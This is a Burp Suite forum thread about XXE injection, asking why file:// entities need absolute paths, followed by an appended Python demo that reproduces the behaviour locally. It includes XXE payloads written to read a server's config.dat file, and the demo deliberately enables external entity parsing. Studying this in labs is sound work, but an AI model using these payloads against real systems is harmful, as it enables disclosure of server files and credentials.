Burp Suite User Forum


XXE file protocol to retrieve files

Jaak | Last updated: Jun 17, 2022 09:41PM UTC

Hello, first of all: thanks for the amazing learning materials, I have really learned a lot!

My question concerns XXE, specifically the "file" protocol mentioned in the learning materials. It says that:

"The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded [...] The URL can use the file:// protocol, and so external entities can be loaded from file. For example: <!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>"

Now, while that works in the PortSwigger labs, I have had one encounter in a different challenge where using the file protocol to retrieve a file fails:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///../../core/config.dat"> ]><root><email>&xxe;</email><password>abc</password></root>

(I get error messages instead of the contents of the file), while just using the file name (without the file protocol) works just fine:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "./../../core/config.dat"> ]><root><email>&xxe;</email><password>abc</password></root>

The error message provided is basically:

Warning: DOMDocument::loadXML(): I/O warning: failed to load external entity "file:///../core/config.dat" in process.php

Now, what I'd like to know:

1) Does anyone know why that is? Might it be because of how the lab/underlying infrastructure is set up?

2) Is it better/possible to always only use the path to the file without the "file" protocol?

Jaak | Last updated: Jun 17, 2022 09:55PM UTC

Issue solved: when using the file protocol, you always have to specify the absolute file path, not the relative one. Just tried that now and it works. Also, it seems that without using the file protocol, it always takes the relative file path.

However, if anyone knows an answer to the following question, it would be greatly appreciated: there are several "protocols", not just the "file" one but also http, ftp, ... Do these always work by default, or do they have to be "enabled" first? I understand that if they're intentionally blocked, they won't work, obviously, but what is the default behaviour?
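The relative-versus-absolute behaviour described in the two posts above, reproduced with Python's standard-library SAX parser (expat) rather than PHP's DOMDocument/libxml2. This is an added example, not code from the thread or from PortSwigger: the directory layout (a temporary tree with www/html/process.xml as the parsed document and core/config.dat two levels up), the file contents and the document template are all constructed for the demonstration. Python has ignored external general entities by default since 3.7.1, so the example switches them back on explicitly to behave like the unhardened parser in the question.

```python
"""Reproduce the relative-vs-absolute SYSTEM identifier behaviour from the
thread with Python's stdlib SAX parser (expat), not PHP/libxml2.  Layout,
file contents and names below are constructed for this example."""
import os
import tempfile
import xml.sax
from xml.sax import handler

# Constructed document template with the same shape as the payloads in the
# thread; only the SYSTEM identifier changes between cases.
DOC_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{sysid}"> ]>'
    '<root><email>&xxe;</email><password>abc</password></root>'
)
SECRET = "db_password=constructed-secret"  # constructed target file contents


class EmailCollector(handler.ContentHandler):
    """Keep only the text inside <email>, i.e. the expanded entity."""

    def __init__(self):
        super().__init__()
        self.in_email = False
        self.parts = []

    def startElement(self, name, attrs):
        self.in_email = (name == "email")

    def endElement(self, name):
        if name == "email":
            self.in_email = False

    def characters(self, content):
        if self.in_email:
            self.parts.append(content)


def parse_with_entities(doc_path):
    """Parse doc_path with external general entities enabled.
    Returns ('ok', entity_text) or ('error', message)."""
    parser = xml.sax.make_parser()
    # Since Python 3.7.1 the stdlib parser ignores external general entities by
    # default.  Turning them on mimics the unhardened parser in the thread; a
    # defensive application leaves this feature off.
    parser.setFeature(handler.feature_external_ges, True)
    collector = EmailCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(doc_path)
    except Exception as exc:  # SAXParseException or the resolver's URLError
        return ("error", f"{type(exc).__name__}: {exc}")
    return ("ok", "".join(collector.parts))


def run_cases():
    """Build the constructed tree <tmp>/www/html/process.xml and
    <tmp>/core/config.dat and try the three SYSTEM identifiers from the thread."""
    with tempfile.TemporaryDirectory() as root:
        webroot = os.path.join(root, "www", "html")
        os.makedirs(webroot)
        os.makedirs(os.path.join(root, "core"))
        target = os.path.join(root, "core", "config.dat")
        with open(target, "w") as f:
            f.write(SECRET)

        cases = {
            # Scheme-less relative reference: resolved against the parsed
            # document's location, so ../.. climbs from www/html to <tmp>.
            "relative": "./../../core/config.dat",
            # file: URL: an absolute URI whose path starts at the filesystem
            # root, where '..' has nothing to climb; the lookup is /core/config.dat.
            "file_relative": "file:///../../core/config.dat",
            # file: URL carrying the full path: the form that works.
            "file_absolute": "file://" + target,
        }
        results = {}
        doc_path = os.path.join(webroot, "process.xml")
        for label, sysid in cases.items():
            with open(doc_path, "w") as f:
                f.write(DOC_TEMPLATE.format(sysid=sysid))
            results[label] = parse_with_entities(doc_path)
        return results


if __name__ == "__main__":
    for label, (status, detail) in run_cases().items():
        print(f"{label:14s} {status:5s} {detail}")
```

Running it shows the relative identifier and the full file: URL both expanding the entity to the target's contents, while file:///../../core/config.dat fails: a file: URL is an absolute URI, so its path is taken from the filesystem root and the parent-directory segments are discarded there, whereas an identifier without a scheme is a relative reference resolved against the parser's base (in this demo the directory of the parsed file; for a document loaded from a string the base is whatever the parser falls back to, which is why the working relative path depends on the target's deployment). The same stdlib resolver fetches the identifier through urllib, so it would follow an http: URL just as readily, which is the reason the feature is off by default and should stay off in any parser that handles untrusted XML.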
